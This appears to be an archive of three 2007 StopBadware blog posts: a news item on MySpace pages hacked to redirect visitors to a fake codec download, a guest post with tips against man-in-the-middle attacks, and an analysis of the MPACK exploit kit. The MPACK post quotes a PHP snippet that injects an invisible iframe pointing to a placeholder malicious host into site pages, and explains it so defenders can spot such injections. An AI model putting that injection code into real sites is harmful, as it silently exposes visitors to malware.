Posted by Erica George
Fri, 09 Nov 2007 22:41:00 GMT
MySpace users, look out for a new brand of website hacking technique that’s emerged over the past week. The hack inserts code that loads a background image linking back to a badware site, and has so far had several prominent victims, most notably pop star Alicia Keyes.
A user who clicks anywhere on the site that is not a legitimate, pre-existing link will be redirected by the linked background image to the badware site, apparently hosted in China. The user will also be prompted to download a codec to view videos – something one might expect on a MySpace page – which itself delivers malware.
The attacks were first noted last week by researchers at FaceTime Communications, and have gained widespread coverage this week due to the hacking of Keyes’s page.
While MySpace reacted quickly to reports of the hacks, there is also word that Keyes’s page, at least, has been reinfected once. There’s no estimate yet on how many users may have been infected, or how many MySpace pages have been compromised, but one thing seems certain: this is a technique to watch out for in the future, on MySpace, and beyond.
Posted in all | Tags codecs, exploits, hacking, myspace
Posted by Erica George
Tue, 16 Oct 2007 20:40:00 GMT
StopBadware volunteer BadMal has been tracking a type of exploit that can affect sites on shared hosting services, and helping users in StopBadware’s discussion group learn about keeping their sites and computers clean. He graciously offered to share his analysis and advice here. (Please note that guest blog posts are independently written by members of our community, and do not represent official positions of StopBadware.org.)
“Man-in-the-Middle Exploits; what they are and how to STOP them” by BadMal
Most of us defend our PCs, websites and servers with an increasing
variety of “anti” tools; however it is equally important to understand
how or where an assault comes from. So when personally considering
your own PC or Internet security this takes a proactive offensive view “I can do something to STOP…” rather than a passive “hiding in the
bunker ” defensive position. The best form of defense is offence?
The main route for many web site hacks, defacement, and denial of
service (DDoS) attacks is Man-in-the-Middle (MITM) exploits. It is a
very easy concept to understand for all of us; consider an unknown
person is able to read, insert and modify at will, messages between
two parties without either party knowing that the link between them
has been compromised. It has a very techie background for those who
want to know more – check out Wikipedia for the background or
definitions. Here I will solely deal with a pragmatic approach of what
you can do to STOP any MTIM.
Firstly a healthy element of paranoia helps, consider from the PC you
are reading this article with, what possible connections are there?
Home or office network, local ISP, regional backbone routers,
international re-routers, DNS servers, server farms, ad networks, web
site host, and finally the web site, MITM could be lurking inside
anyone of these connections, points or nodes, and as we know so well
at StopBadware, within a script on a web site. Worried? Don’t be; just
assume the MITM is there, you have the all the solutions at hand and
mostly free. The answer is in the technical background “cryptography”,
i.e. encryption, passwords, Chmod (website file permissions), and
CAPTCHA (establishing the user is a human). Action checklist for all:
Email: use a digital ID or certificate (low cost), PGP encryption
(pretty good privacy – free), and as a surprise for sensitive email I
now use and recommend Gmail with HTTPS, less connections! All this
STOPS any MITM from being able to read your emails.
Web Surfing: Only access online shops or other personal ID sensitive
areas where there is HTTPS (SLL), look at the web address, use secure
and change your passwords regularly. If you really want to be in
control use Firefox with added extras e.g. No-Script (STOPS any
script, unless you say OK), Key Scrambler (encrypts any login or
password entry STOPS keyloggers), set your privacy options not to accept
any cookie (STOPS unwanted and bad cookies from being stored on your
PC), even consider using PHproxy (this STOPS a web site from even
gaining your real IP address).
Webmasters: Only use FTPS to transfer files between your web site and
the PC (this STOPS any MITM from intercepting data), use Chmod to
restrict access to files, encrypt file directories where you can,
apply different passwords to access cPanel, phpMyAdmin, use CAPTCHA
for user logins and apply SSL for user data areas (these actions STOP
any MTIM from gaining access to your files.
Blocking: Probably the best offensive action you can take, think of it
like this “your PC is your home your website is your shop, club, bar,
you have the total right to bar entrance to hooligans or thieves”. It
is much easier to refuse entrance than to try and throw the unwanted
visitor out. For example use OpenDNS on your router it is free,
automatically STOPS phishing sites and many other blocking options.
Use banning lists on cPanel, ban spammers on your forum, or ask your
host for help.
Finally refuse to be a victim and hide in the bunker, STOP the MTIM
you actually have all the tools at hand. But…. what if a MITM is
already hiding inside before you go on the offensive? Check and clean
your PC of any BadWare; for the webmaster does your webhost also host
any bad guys? Easy to determine, check the latest block lists on the
web.
- BadMal
Thanks, BadMal! StopBadware welcomes guest post ideas from members of our volunteer community. If there’s an issue in badware-fighting that you’d like to help us highlight here, contact us!
Posted in all | Tags badmal, defense, exploits, guestposts, maninthemiddle, mitm
Posted by Oliver Day
Fri, 13 Jul 2007 18:43:00 GMT
The folks at SANS published an excellent write up which breaks down the MPACK exploit package. MPACK confirmed a lot of theories that SBW had regarding exploit patterns recorded over time. In particular they use nit like behavior which homes in on the "scalp" of html document such as <body> and <html> tags. The following code was pointed out in the SANS entry:
$file_types = array('php', 'htm', 'html', 'tpl');
$iframed_content = str_replace('</body>',
'<iframe src=http://[EVIL].info/counter style=display:none>
</iframe></body>', $content);
The code above looks for the closing body tag and prepends an invisible iframe to it. If we break down the iframe tag the parameters achieve the following:
- src = the url of the malicious code that is loaded
- style = turns iframe invisible using CSS style trick
Other variants to induce invisibility include using width="0" and height="0" which has the same effect as style=display:none.
The Stopbadware team has seen this pattern for quite some time and it is possible that other packaged exploits use this style. It was more common in less technically impressive distributions to see the exploit appended to the file. This would be accomplished by using the "echo" command to simply append the iframe to the end of any html or php file. It is fair to say that if an iframe (or javascript) occurs before the opening html tag (<html>) or after the closing html tag (</html>) someone has injected code into that page.
The SANS entry goes on to provide reasons behind the success of these attacks. The analysis confirms a great many theories we had come up with. In particular the ability to compromise a single account and leverage that into a system wide exploit. This is particularly effective when used against "value" hosting providers who push 1000 or more websites onto a single box. It would make sense for hosting providers who are on our lists to consider following the changes recommended by this guid [1] and setup suExec or a proper chroot jail for the webserver. Before embarking on this task realize that there are issues to setting up suExec or a chroot jail. These issues include:
- increased time to setup
- more support tickets due to increased complexity
- more resource use (ram, processor) means less users per server
However the upside is that a single compromise will not lead to the infection of all the other users on your system. Thousands of support calls and possibly the loss of revenue as an angry, and infected, userbase migrate over to a more secure hosting provider are a potential downside to not implementing a more secure environment. Stopbadware will be making a point of educating website owners in our community to ask their hosting providers for these security measures to ensure they seek out more secure environments.
[1] http://www.seaoffire.net/fcgi-faq.html
Posted in all | Tags exploits, mpack
